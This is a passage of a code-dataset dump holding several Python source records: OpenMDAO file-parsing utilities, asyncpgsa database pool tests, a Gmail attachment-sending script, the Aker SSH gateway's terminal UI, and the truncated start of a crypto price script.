\"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_line(self, row):\n \"\"\"\n Return an entire line, relative to current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n\n Returns\n -------\n string\n Line at the location requested.\n \"\"\"\n return self._data[self._current_row + row].rstrip()\n\n def transfer_var(self, row, field, fieldend=None):\n \"\"\"\n Get a single variable relative to the current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n If the delimiter is a set of chars: which word in line to retrieve.\n If the delimiter is 'columns': character position to start.\n fieldend : int (optional)\n If the delimiter is a set of chars: IGNORED.\n If the delimiter is 'columns': position of last character to return, or if\n omitted, the end of the line is used.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j = self._current_row + row\n\n line = self._data[j]\n\n if self._delimiter == \"columns\":\n if not fieldend:\n line = line[(field - 1):]\n else:\n line = line[(field - 1):(fieldend)]\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n data = self._parse_line().parseString(line)\n\n # data might have been split if it contains whitespace. 
If so,\n # just return the whole string\n if len(data) > 1:\n return line\n else:\n return data[0]\n else:\n data = self._parse_line().parseString(line)\n return data[field - 1]\n\n def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):\n \"\"\"\n Search for a key relative to the current anchor and get a field from that line.\n\n You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.\n This function just combines them for convenience.\n\n Parameters\n ----------\n key : str\n The key to search for.\n field : int\n Which field to transfer. Field 0 is the key.\n occurrence : int\n Find nth instance of text; default is 1 (first value\n field). Use -1 to find last occurance. Position 0 is the key\n field, so it should not be used as a value for occurrence.\n rowoffset : int (optional)\n Optional row offset from the occurrence of key. This can\n also be negative.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if not isinstance(occurrence, int) or occurrence == 0:\n msg = \"The value for occurrence must be a nonzero integer\"\n raise ValueError(msg)\n\n instance = 0\n if occurrence > 0:\n row = 0\n for line in self._data[self._current_row:]:\n if line.find(key) > -1:\n instance += 1\n if instance == occurrence:\n break\n row += 1\n\n elif occurrence < 0:\n row = -1\n for line in reversed(self._data[self._current_row:]):\n if line.find(key) > -1:\n instance += -1\n if instance == occurrence:\n break\n row -= 1\n\n j = self._current_row + row + rowoffset\n line = self._data[j]\n\n fields = self._parse_line().parseString(line.replace(key, \"KeyField\"))\n\n return fields[field]\n\n def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):\n \"\"\"\n Get an array of variables relative to the current anchor.\n\n Setting the delimiter to 'columns' elicits some special behavior\n from this method. Normally, the extraction process wraps around\n at the end of a line and continues grabbing each field at the start of\n a newline. When the delimiter is set to columns, the parameters\n (rowstart, fieldstart, rowend, fieldend) demark a box, and all\n values in that box are retrieved. Note that standard whitespace\n is the secondary delimiter in this case.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int, optional\n Row number to end. If not set, then only one row is grabbed.\n fieldend : int\n Field number to end.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j1 = self._current_row + rowstart\n\n if rowend is None:\n j2 = j1 + 1\n else:\n j2 = self._current_row + rowend + 1\n\n if not fieldend:\n raise ValueError(\"fieldend is missing, currently required\")\n\n lines = self._data[j1:j2]\n\n data = np.zeros(shape=(0, 0))\n\n for i, line in enumerate(lines):\n if self._delimiter == \"columns\":\n line = line[(fieldstart - 1):fieldend]\n\n # Stripping whitespace may be controversial.\n line = line.strip()\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n parsed = self._parse_line().parseString(line)\n\n newdata = np.array(parsed[:])\n # data might have been split if it contains whitespace. 
If the\n # data is string, we probably didn't want this.\n if newdata.dtype.type is np.str_:\n newdata = np.array(line)\n\n data = np.append(data, newdata)\n else:\n parsed = self._parse_line().parseString(line)\n\n if i == j2 - j1 - 1:\n data = np.append(data, np.array(parsed[(fieldstart - 1):fieldend]))\n else:\n data = np.append(data, np.array(parsed[(fieldstart - 1):]))\n\n fieldstart = 1\n\n return data\n\n def transfer_2Darray(self, rowstart, fieldstart, rowend, fieldend=None):\n \"\"\"\n Get a 2D array of variables relative to the current anchor.\n\n Each line of data is placed in a separate row.\n\n If the delimiter is set to 'columns', then the values contained in\n fieldstart and fieldend should be the column number instead of the\n field number.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int\n Row number to end relative to current anchor.\n fieldend : int (optional)\n Field number to end. If not specified, grabs all fields up to the\n end of the line.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if fieldend and (fieldstart > fieldend):\n msg = \"fieldend must be greater than fieldstart\"\n raise ValueError(msg)\n\n if rowstart > rowend:\n msg = \"rowend must be greater than rowstart\"\n raise ValueError(msg)\n\n j1 = self._current_row + rowstart\n j2 = self._current_row + rowend + 1\n lines = list(self._data[j1:j2])\n\n if self._delimiter == \"columns\":\n if fieldend:\n line = lines[0][(fieldstart - 1):fieldend]\n else:\n line = lines[0][(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n row = np.array(parsed[:])\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n if fieldend:\n line = line[(fieldstart - 1):fieldend]\n else:\n line = line[(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n data[i + 1, :] = np.array(parsed[:])\n else:\n parsed = self._parse_line().parseString(lines[0])\n if fieldend:\n row = np.array(parsed[(fieldstart - 1):fieldend])\n else:\n row = np.array(parsed[(fieldstart - 1):])\n\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n parsed = self._parse_line().parseString(line)\n\n if fieldend:\n try:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):fieldend])\n except Exception:\n print(data)\n else:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):])\n\n return data\n\n def _parse_line(self):\n \"\"\"\n Parse a single data line that may contain string or numerical data.\n\n Float and Int 'words' are converted to their appropriate type.\n Exponentiation is supported, as are NaN and Inf.\n\n Returns\n -------\n \n the parsed line.\n \"\"\"\n return self.line_parse_token\n\n def _reset_tokens(self):\n \"\"\"\n Set up the tokens for pyparsing.\n \"\"\"\n # Somewhat of a hack, but we can only use printables if the delimiter is\n # just whitespace. Otherwise, some seprators (like ',' or '=') potentially\n # get parsed into the general string text. 
So, if we have non whitespace\n # delimiters, we need to fall back to just alphanums, and then add in any\n # missing but important symbols to parse.\n if self._delimiter.isspace():\n textchars = printables\n else:\n textchars = alphanums\n\n symbols = ['.', '/', '+', '*', '^', '(', ')', '[', ']', '=',\n ':', ';', '?', '%', '&', '!', '#', '|', '<', '>',\n '{', '}', '-', '_', '@', '$', '~']\n\n for symbol in symbols:\n if symbol not in self._delimiter:\n textchars = textchars + symbol\n\n digits = Word(nums)\n dot = \".\"\n sign = oneOf(\"+ -\")\n ee = CaselessLiteral('E') | CaselessLiteral('D')\n\n num_int = _ToInteger(Combine(Optional(sign) + digits))\n\n num_float = _ToFloat(Combine(\n Optional(sign) +\n ((digits + dot + Optional(digits)) | (dot + digits)) +\n Optional(ee + Optional(sign) + digits)\n ))\n\n # special case for a float written like \"3e5\"\n mixed_exp = _ToFloat(Combine(digits + ee + Optional(sign) + digits))\n\n nan = (_ToInf(oneOf(\"Inf -Inf\")) |\n _ToNan(oneOf(\"NaN nan NaN% NaNQ NaNS qNaN sNaN 1.#SNAN 1.#QNAN -1.#IND\")))\n\n string_text = Word(textchars)\n\n self.line_parse_token = (OneOrMore((nan | num_float | mixed_exp | num_int | string_text)))\n", "repo_name": "OpenMDAO/OpenMDAO", "sub_path": "openmdao/utils/file_wrap.py", "file_name": "file_wrap.py", "file_ext": "py", "file_size_in_byte": 34305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 451, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyparsing.TokenConverter", "line_number": 16, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 170, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 196, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 222, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 248, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 310, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 354, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 453, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 500, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 550, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement.setDefaultWhitespaceChars", "line_number": 689, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement", "line_number": 689, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 929, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 942, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 945, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1007, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1008, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1018, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1026, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1034, "usage_type": 
"call"}, {"api_name": "numpy.array", "line_number": 1038, "usage_type": "call"}, {"api_name": "pyparsing.printables", "line_number": 1066, "usage_type": "name"}, {"api_name": "pyparsing.alphanums", "line_number": 1068, "usage_type": "name"}, {"api_name": "pyparsing.Word", "line_number": 1078, "usage_type": "call"}, {"api_name": "pyparsing.nums", "line_number": 1078, "usage_type": "argument"}, {"api_name": "pyparsing.oneOf", "line_number": 1080, "usage_type": "call"}, {"api_name": "pyparsing.CaselessLiteral", "line_number": 1081, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1085, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1086, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1087, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1088, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1094, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1095, "usage_type": "call"}, {"api_name": "pyparsing.Word", "line_number": 1097, "usage_type": "call"}, {"api_name": "pyparsing.OneOrMore", "line_number": 1099, "usage_type": "call"}]} +{"seq_id": "35151197031", "text": "import sqlalchemy as sa\n\n\nasync def test_pool_basic(pool):\n async with pool.acquire() as con:\n result = await con.fetch('SELECT * FROM sqrt(16)')\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_pool_connection_transaction_context_manager(pool):\n async with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_use_sqlalchemy_with_escaped_params(pool):\n \"\"\"\n Use sqlalchemy with escaped params\n Make sure that the escaped parameters get used in the right order\n :return:\n \"\"\"\n query = sa.select('*') \\\n .select_from(sa.text('sqrt(:num) as a')) \\\n .select_from(sa.text('sqrt(:a2) as b')) \\\n .select_from(sa.text('sqrt(:z3) as c')) \\\n .params(num=16, a2=36, z3=25)\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n row = result[0]\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n\nasync def test_use_sa_core_objects(pool):\n pg_tables = sa.Table(\n 'pg_tables', sa.MetaData(),\n sa.Column('schemaname'),\n sa.Column('tablename'),\n sa.Column('tableowner'),\n sa.Column('tablespace'),\n sa.Column('hasindexes')\n )\n\n query = pg_tables.select().where(pg_tables.c.schemaname == 'pg_catalog')\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n for row in result:\n # just making sure none of these throw KeyError exceptions\n assert isinstance(row['schemaname'], str)\n assert 'tablename' in row\n assert 'tableowner' in row\n assert 'tablespace' in row\n assert 'hasindexes' in row\n\n\nasync def test_with_without_async_should_throw_exception(pool):\n try:\n with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n raise Exception('Should have thrown RuntimeError')\n except RuntimeError as e:\n assert str(e) == 'Must use \"async with\" for a transaction'\n\nasync def test_falsyness_of_rows_on_fetch(pool):\n async with pool.acquire() as conn:\n rows = await conn.fetch('SELECT * 
FROM pg_stat_activity '\n 'WHERE pid=400')\n assert bool(rows) == False\n", "repo_name": "CanopyTax/asyncpgsa", "sub_path": "tests/test_pool.py", "file_name": "test_pool.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 411, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.select", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "30647574825", "text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n\ndef send_email(my_email):\n fromaddr = my_email.fromaddr\n toaddr = my_email.toaddr\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"Subject of the Mail\"\n body = \"Body_of_the_mail\"\n msg.attach(MIMEText(body, 'plain'))\n filename = my_email.filepath.rpartition('\\\\')[-1]\n attachment = open(my_email.filepath, \"rb\")\n p = MIMEBase('application', 'octet-stream')\n p.set_payload(attachment.read())\n encoders.encode_base64(p)\n p.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n msg.attach(p)\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.login(fromaddr, my_email.password)\n text = msg.as_string()\n s.sendmail(fromaddr, toaddr, text)\n s.quit()\n\ndef main(my_email):\n send_email(my_email)\n\nif __name__ == '__main__':\n main(my_email)", "repo_name": "petyapython/pack_and_send", "sub_path": "send.py", "file_name": "send.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 11, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 16, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 19, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 21, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 21, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "3054141243", "text": "__license__ = \"AGPLv3\"\n__author__ = 'Ahmed Nazmy '\n\n\nimport urwid\nimport aker\nimport signal\nimport logging\nimport os\nfrom popup import SimplePopupLauncher\n\n\nclass Listing(urwid.ListBox):\n \"\"\"\n Base class to handle listbox actions\n \"\"\"\n\n def __init__(self, items=None):\n self.search = Search()\n self.search.update_text(\"Type to search:\\n\")\n self._items = []\n if items is not None:\n for item in items:\n listitem = MenuItem(\"%s\" % (item))\n self._items.append(\n urwid.AttrMap(\n listitem,\n 'body',\n 
focus_map='SSH_focus'))\n super(Listing, self).__init__(urwid.SimpleFocusListWalker(self._items))\n\n def updatelist(self, items):\n self.empty()\n for item in items:\n self.add_item(item)\n\n def add_item(self, item):\n listitem = MenuItem(\"%s\" % (item))\n self.body.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n\n def empty(self):\n del self.body[:] # clear listbox\n\n def get_selected(self):\n return self.focus\n\n def get_box(self):\n self.search.clear()\n return urwid.Frame(urwid.AttrWrap(self, 'body'), header=self.search)\n\n\nclass HostList(Listing):\n \"\"\"\n Class to handle hosts screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hosts=None):\n super(HostList, self).__init__(hosts)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n urwid.emit_signal(\n self,\n 'connect',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n if self.search.get_edit_text() == \"\":\n key = 'left'\n else:\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostList, self).keypress(size, key)\n\n\nclass HostGroupList(Listing):\n \"\"\"\n Class to handle hostgroups screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hostgroups=None):\n super(HostGroupList, self).__init__(hostgroups)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n # emit signal to call hostgroup_chosen_handler with MenuItem caption,\n # caption is group name showing on screen\n if self.focus is not None:\n urwid.emit_signal(\n self,\n 'group_chosen',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostGroupList, self).keypress(size, key)\n\n\nclass Header(urwid.Columns):\n def __init__(self, text):\n self.text = text\n self.header_widget = urwid.Text(self.text, align='left')\n self.popup = SimplePopupLauncher()\n self.popup_padding = urwid.Padding(self.popup, 'right', 20)\n self.popup_map = urwid.AttrMap(self.popup_padding, 'indicator')\n self.header_map = urwid.AttrMap(self.header_widget, 'head')\n super(Header, self).__init__([self.header_map, self.popup_map])\n\n def update_text(self, text):\n self.text = text\n self.header_map.original_widget.set_text(self.text)\n\n def popup_message(self, message):\n logging.debug(\"TUI: popup message is {0}\".format(message))\n self.popup.message = str(message)\n self.popup.open_pop_up()\n\n\nclass Footer(urwid.AttrMap):\n def __init__(self, text):\n self.footer_text = urwid.Text(text, align='center')\n super(Footer, self).__init__(self.footer_text, 'foot')\n\n\nclass Search(urwid.Edit):\n def __init__(self):\n super(Search, self).__init__()\n\n def update_text(self, caption):\n self.set_caption(caption)\n\n def clear(self):\n self.set_edit_text(\"\")\n\n\nclass MenuItem(urwid.Text):\n def __init__(self, caption):\n self.caption = caption\n urwid.Text.__init__(self, self.caption)\n\n def keypress(self, size, key):\n return key\n\n def selectable(self):\n return True\n\n def get_caption(self):\n return str(self.caption)\n\n\nclass Window(object):\n 
\"\"\"\n Where all the Tui magic happens,\n handles creating urwid widgets and\n user interactions\n \"\"\"\n\n def __init__(self, aker_core):\n self.aker = aker_core\n self.user = self.aker.user\n self.current_hostgroup = \"\"\n self.set_palette()\n\n def set_palette(self):\n self.palette = [\n ('body', 'black', 'light gray'), # Normal Text\n ('focus', 'light green', 'black', 'standout'), # Focus\n ('head', 'white', 'dark gray', 'standout'), # Header\n ('foot', 'light gray', 'dark gray'), # Footer Separator\n ('key', 'light green', 'dark gray', 'bold'),\n ('title', 'white', 'black', 'bold'),\n ('popup', 'white', 'dark red'),\n ('msg', 'yellow', 'dark gray'),\n ('SSH', 'dark blue', 'light gray', 'underline'),\n ('SSH_focus', 'light green', 'dark blue', 'standout')] # Focus\n\n def draw(self):\n self.header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \"]\n\n self.footer_text = [\n ('msg', \"Move:\"),\n ('key', \"Up\"), \",\",\n ('key', \"Down\"), \",\",\n ('key', \"Left\"), \",\",\n ('key', \"Right\"), \",\",\n ('key', \"PgUp\"), \",\",\n ('key', \"PgDn\"), \",\",\n ('msg', \"Select:\"),\n ('key', \"Enter\"), \" \",\n ('msg', \"Refresh:\"),\n ('key', \"F5\"), \" \",\n ('msg', \"Quit:\"),\n ('key', \"F9\"), \" \",\n ('msg', \"By:\"),\n ('key', \"Ahmed Nazmy\")]\n\n # Define widgets\n self.header = Header(self.header_text)\n self.footer = Footer(self.footer_text)\n self.hostgrouplist = HostGroupList(list(self.user.hostgroups.keys()))\n self.hostlist = HostList(list(self.user.allowed_ssh_hosts.keys()))\n self.topframe = urwid.Frame(\n self.hostgrouplist.get_box(),\n header=self.header,\n footer=self.footer)\n self.screen = urwid.raw_display.Screen()\n\n # Register signals\n urwid.register_signal(HostList, ['connect'])\n urwid.register_signal(HostGroupList, ['group_chosen'])\n\n # Connect signals\n urwid.connect_signal(\n self.hostgrouplist.search,\n 'change',\n self.group_search_handler)\n urwid.connect_signal(\n self.hostgrouplist,\n 'group_chosen',\n self.group_chosen_handler)\n urwid.connect_signal(\n self.hostlist.search,\n 'change',\n self.host_search_handler)\n urwid.connect_signal(\n self.hostlist,\n 'connect',\n self.host_chosen_handler)\n\n self.loop = urwid.MainLoop(\n self.topframe,\n palette=self.palette,\n unhandled_input=self._input_handler,\n screen=self.screen,\n pop_ups=True)\n\n def _input_handler(self, key):\n if not urwid.is_mouse_event(key):\n if key == 'f5':\n self.update_lists()\n elif key == 'f9':\n logging.info(\n \"TUI: User {0} logging out of Aker\".format(\n self.user.name))\n raise urwid.ExitMainLoop()\n elif key == 'left':\n # For now if its not hostgroup window left should bring it up\n if self.topframe.get_body() != self.hostgrouplist.get_box():\n self.current_hostgroup = \"\"\n self.hostlist.empty()\n self.header.update_text(self.header_text)\n self.topframe.set_body(self.hostgrouplist.get_box())\n else:\n logging.debug(\n \"TUI: User {0} unhandled input : {1}\".format(\n self.user.name, key))\n\n def group_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Group search handler called with text {0}\".format(search_text))\n matchinghostgroups = []\n for hostgroup in self.user.hostgroups.keys():\n if search_text in hostgroup:\n logging.debug(\n \"TUI: hostgroup {1} matches search text {0}\".format(\n search_text, hostgroup))\n matchinghostgroups.append(hostgroup)\n self.hostgrouplist.updatelist(matchinghostgroups)\n\n def host_search_handler(self, search, search_text):\n logging.debug(\n 
\"TUI: Host search handler called with text {0}\".format(search_text))\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n if search_text in host:\n logging.debug(\n \"TUI: host {1} matches search text {0}\".format(\n search_text, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n\n def group_chosen_handler(self, hostgroup):\n logging.debug(\n \"TUI: user %s chose hostgroup %s \" %\n (self.user.name, hostgroup))\n self.current_hostgroup = hostgroup\n self.hostlist.empty()\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n logging.debug(\n \"TUI: host {1} is in hostgroup {0}, adding\".format(\n hostgroup, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \",\n ('msg', \"HostGroup:\"),\n ('key', \"%s\" % self.current_hostgroup)]\n self.header.update_text(header_text)\n self.topframe.set_body(self.hostlist.get_box())\n\n def host_chosen_handler(self, choice):\n host = choice\n logging.debug(\"TUI: user %s chose server %s \" % (self.user.name, host))\n self.aker.init_connection(self.user.allowed_ssh_hosts[host])\n\n def update_lists(self):\n logging.info(\n \"TUI: Refreshing entries for user {0}\".format(\n self.aker.user.name))\n self.aker.user.refresh_allowed_hosts(False)\n self.hostgrouplist.empty()\n for hostgroup in self.user.hostgroups.keys():\n self.hostgrouplist.add_item(hostgroup)\n if self.current_hostgroup != \"\":\n self.hostlist.empty()\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n self.hostlist.add_item(host)\n self.header.popup_message(\"Entries Refreshed\")\n\n def start(self):\n logging.debug(\"TUI: tui started\")\n self.loop.run()\n\n def stop(self):\n logging.debug(u\"TUI: tui stopped\")\n raise urwid.ExitMainLoop()\n\n def pause(self):\n logging.debug(\"TUI: tui paused\")\n self.loop.screen.stop()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n\n def restore(self):\n logging.debug(\"TUI restored\")\n self.loop.screen.start()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n", "repo_name": "aker-gateway/Aker", "sub_path": "tui.py", "file_name": "tui.py", "file_ext": "py", "file_size_in_byte": 12044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 562, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urwid.ListBox", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urwid.AttrMap", "line_number": 26, "usage_type": "call"}, {"api_name": "urwid.SimpleFocusListWalker", "line_number": 30, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 40, "usage_type": "call"}, {"api_name": "urwid.Frame", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.AttrWrap", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 67, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 99, "usage_type": "call"}, {"api_name": "urwid.Columns", "line_number": 114, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 117, "usage_type": "call"}, {"api_name": "popup.SimplePopupLauncher", "line_number": 118, "usage_type": "call"}, {"api_name": "urwid.Padding", "line_number": 119, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 120, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 
121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 129, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 134, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 136, "usage_type": "call"}, {"api_name": "urwid.Edit", "line_number": 140, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 151, "usage_type": "attribute"}, {"api_name": "urwid.Text.__init__", "line_number": 154, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 154, "usage_type": "attribute"}, {"api_name": "urwid.Frame", "line_number": 220, "usage_type": "call"}, {"api_name": "urwid.raw_display.Screen", "line_number": 224, "usage_type": "call"}, {"api_name": "urwid.raw_display", "line_number": 224, "usage_type": "attribute"}, {"api_name": "urwid.register_signal", "line_number": 227, "usage_type": "call"}, {"api_name": "urwid.register_signal", "line_number": 228, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 231, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 235, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 239, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 243, "usage_type": "call"}, {"api_name": "urwid.MainLoop", "line_number": 248, "usage_type": "call"}, {"api_name": "urwid.is_mouse_event", "line_number": 256, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 260, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 272, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 277, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 282, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 301, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 308, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 324, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 328, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 342, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 346, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 347, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 350, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 352, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 352, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 355, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 357, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 357, "usage_type": "attribute"}]} +{"seq_id": "38688017056", "text": "import time\nfrom prettytable import PrettyTable\n\nfrom coin_price import get_coin_price, get_p2p_price\nfrom check_prices import check_prices\nfrom table import create_table\n\nsumma = 5000\n\nstart = time.time()\n\np2pUSDTbuy = get_p2p_price('USDT', 'BUY', summa)\np2pBTCbuy 